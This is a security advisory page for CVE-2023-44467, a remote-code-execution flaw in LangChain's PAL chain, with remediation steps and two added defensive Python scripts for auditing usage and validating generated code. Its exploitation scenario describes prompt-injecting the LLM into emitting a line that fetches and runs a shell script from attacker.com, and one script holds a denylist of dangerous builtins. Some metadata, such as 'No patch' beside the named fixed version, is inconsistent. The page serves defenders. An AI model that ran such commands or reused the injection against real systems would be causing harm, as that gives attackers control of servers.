CVE-2023-44467: LangChain: RCE bypass via __import__ in PAL chain

CRITICAL | ACTIVELY EXPLOITED | PoC AVAILABLE
Published October 9, 2023
CISO Take

If you run any LangChain application using the PAL (Program-Aided Language) chain, you have an unauthenticated RCE vulnerability that bypasses the prior CVE-2023-36258 patch. Upgrade langchain_experimental to >=0.0.306 immediately. Any deployment accepting user-controlled input to PAL chains should be treated as fully compromised until patched.

What is the risk?

Critical risk. CVSS 9.8 reflects the worst-case combination: network-accessible, zero privileges required, zero user interaction, and full C/I/A compromise. The bypass nature — circumventing a prior fix — signals active adversarial research into escape paths, increasing the probability of in-the-wild exploitation. LangChain's widespread enterprise adoption in AI pipelines and internal tooling significantly amplifies the attack surface.

What systems are affected?

Package: LangChain
Ecosystem: pip
Vulnerable Range: -
Patched: No patch
139.8K | OpenSSF 5.9 | 2.7K dependents | Pushed 2d ago | 24% patched | ~156d to patch

Do you use LangChain? You're affected.

How severe is it?

CVSS 3.1: 9.8 / 10
EPSS: 0.9% chance of exploitation in 30 days (higher than 56% of all CVEs)
Exploitation Status: Actively Exploited
Sophistication: Trivial
Exploitation Confidence: high
  - CISA KEV (active exploitation confirmed)
  - Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

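Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High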

What should I do?

  1. Patch: Upgrade langchain_experimental to >=0.0.306 immediately — no workaround is reliable.

  2. Audit: Identify all applications using PAL chain (grep for 'pal_chain', 'PALChain', or 'from langchain_experimental.pal_chain').

  3. Isolate: If patching is delayed, disable PAL chain endpoints or restrict them to trusted internal networks only.

  4. Sandbox: Run PAL chain execution in a hardened sandbox (gVisor, Firecracker, or restricted Docker with no network egress and read-only filesystem).

  5. Monitor: Alert on unexpected process spawning from Python processes running LangChain.

  6. Rotate credentials: Assume all API keys and secrets accessible to affected instances are compromised if exposed externally.
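
Steps 1 and 2 as an added script (not part of the advisory or of LangChain): it searches a source tree for the PAL chain strings named in step 2 and compares the installed langchain_experimental version against 0.0.306. The sample project tree and the helper names are constructed for the example.

```python
from __future__ import annotations

import re
import tempfile
from importlib import metadata
from pathlib import Path

FIXED = (0, 0, 306)  # first patched langchain_experimental release, per the advisory
PAL_PATTERN = re.compile(r"pal_chain|PALChain")  # search strings from step 2

def parse_version(text: str) -> tuple[int, ...]:
    """Turn '0.0.305' into (0, 0, 305); suffixes after the third number are ignored."""
    match = re.match(r"(\d+)\.(\d+)\.(\d+)", text)
    if match is None:
        raise ValueError(f"unrecognised version: {text!r}")
    return tuple(int(part) for part in match.groups())

def is_patched(version: str) -> bool:
    return parse_version(version) >= FIXED

def installed_version() -> str | None:
    """Version of langchain_experimental in this environment, or None if absent."""
    for name in ("langchain-experimental", "langchain_experimental"):
        try:
            return metadata.version(name)
        except metadata.PackageNotFoundError:
            continue
    return None

def find_pal_usage(root: Path) -> list[tuple[str, int, str]]:
    """Return (relative path, line number, line) for each PAL chain reference."""
    hits = []
    for path in sorted(root.rglob("*.py")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            if PAL_PATTERN.search(line):
                hits.append((path.relative_to(root).as_posix(), lineno, line.strip()))
    return hits

def build_sample_tree(root: Path) -> None:
    """Constructed sample project, used only for the demo run below."""
    (root / "app").mkdir()
    (root / "app" / "math_bot.py").write_text(
        "from langchain_experimental.pal_chain import PALChain\n"
        "chain = PALChain.from_math_prompt(llm)\n")
    (root / "app" / "util.py").write_text("def add(a, b):\n    return a + b\n")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(Path(tmp))
        print(find_pal_usage(Path(tmp)))
    ver = installed_version()
    print(ver, "patched" if ver and is_patched(ver) else "vulnerable or not installed")
```

To audit a real code base, pass its root directory to `find_pal_usage` and run the script inside the virtual environment the application uses.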

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Art. 15 - Accuracy, Robustness and Cybersecurity
ISO 42001: A.6.2.5 - AI System Security Controls
NIST AI RMF: MANAGE-2.2 - Risk Treatment — AI Risk Mitigation
OWASP LLM Top 10: LLM01 - Prompt Injection; LLM02 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2023-44467?

If you run any LangChain application using the PAL (Program-Aided Language) chain, you have an unauthenticated RCE vulnerability that bypasses the prior CVE-2023-36258 patch. Upgrade langchain_experimental to >=0.0.306 immediately. Any deployment accepting user-controlled input to PAL chains should be treated as fully compromised until patched.

Is CVE-2023-44467 actively exploited?

Yes, CVE-2023-44467 is confirmed actively exploited and is listed in the CISA Known Exploited Vulnerabilities catalog.

How to fix CVE-2023-44467?

  1. Patch: Upgrade langchain_experimental to >=0.0.306 immediately — no workaround is reliable.

  2. Audit: Identify all applications using PAL chain (grep for 'pal_chain', 'PALChain', or 'from langchain_experimental.pal_chain').

  3. Isolate: If patching is delayed, disable PAL chain endpoints or restrict them to trusted internal networks only.

  4. Sandbox: Run PAL chain execution in a hardened sandbox (gVisor, Firecracker, or restricted Docker with no network egress and read-only filesystem).

  5. Monitor: Alert on unexpected process spawning from Python processes running LangChain.

  6. Rotate credentials: Assume all API keys and secrets accessible to affected instances are compromised if exposed externally.

What systems are affected by CVE-2023-44467?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LLM reasoning pipelines, code-executing AI agents, PAL chain deployments, AI coding and math assistants.

What is the CVSS score for CVE-2023-44467?

CVE-2023-44467 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.94%.

What is the AI security impact?

Affected AI Architectures

agent frameworks, LLM reasoning pipelines, code-executing AI agents, PAL chain deployments, AI coding and math assistants

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0051 LLM Prompt Injection

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.6.2.5
NIST AI RMF: MANAGE-2.2
OWASP LLM Top 10: LLM01, LLM02

What are the technical details?

Original Advisory

langchain_experimental (aka LangChain Experimental) in LangChain before 0.0.306 allows an attacker to bypass the CVE-2023-36258 fix and execute arbitrary code via __import__ in Python code, which is not prohibited by pal_chain/base.py.

Exploitation Scenario

An attacker sends a crafted natural language query to a LangChain application using PAL chain — for example, a math reasoning assistant or agentic tool. The PAL chain prompts the LLM to generate Python code to solve the query. The attacker's input is designed to cause the LLM to include '__import__("os").system("curl attacker.com/shell.sh | bash")' or similar in the generated code. Because pal_chain/base.py's sanitization blocklist does not prohibit __import__, the code executes unobstructed on the server, granting full RCE with the process's privileges. No authentication, no special access — one HTTP request is sufficient.
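
The gap described above, shown as an added example (not LangChain's pal_chain/base.py code): a hypothetical validator that rejects only import statements passes generated code that calls __import__, while an AST check on names and dunder attributes flags it. The sample strings are constructed and are only parsed, never executed.

```python
import ast

# Constructed samples of LLM-generated code (parsed only, never executed).
BENIGN = "def solution():\n    total = 3 * 7 + 2\n    return total\n"
IMPORT_STMT = "import os\ndef solution():\n    return os.getcwd()\n"
DUNDER_IMPORT = "def solution():\n    return __import__('os').getcwd()\n"

# Builtins that load modules, run code or touch files (illustrative denylist).
BLOCKED_NAMES = {"__import__", "eval", "exec", "compile", "open"}


def statement_only_check(source: str) -> list[str]:
    """Hypothetical weak validator: looks for import statements and nothing else."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.append(f"line {node.lineno}: import statement")
    return findings


def strict_check(source: str) -> list[str]:
    """Adds checks for blocked builtin names and for dunder attribute access."""
    findings = statement_only_check(source)
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Name) and node.id in BLOCKED_NAMES:
            findings.append(f"line {node.lineno}: name {node.id}")
        elif isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            findings.append(f"line {node.lineno}: attribute {node.attr}")
    return findings


if __name__ == "__main__":
    samples = {"benign": BENIGN, "import": IMPORT_STMT, "__import__": DUNDER_IMPORT}
    for label, code in samples.items():
        weak = "reject" if statement_only_check(code) else "accept"
        strict = "reject" if strict_check(code) else "accept"
        print(f"{label:12} statement-only={weak:7} strict={strict}")
```

A denylist like this narrows the gap but is not a security boundary; the sandboxing in step 4 is what contains generated code that a check misses.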

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published: October 9, 2023
Last Modified: November 21, 2024
First Seen: October 9, 2023
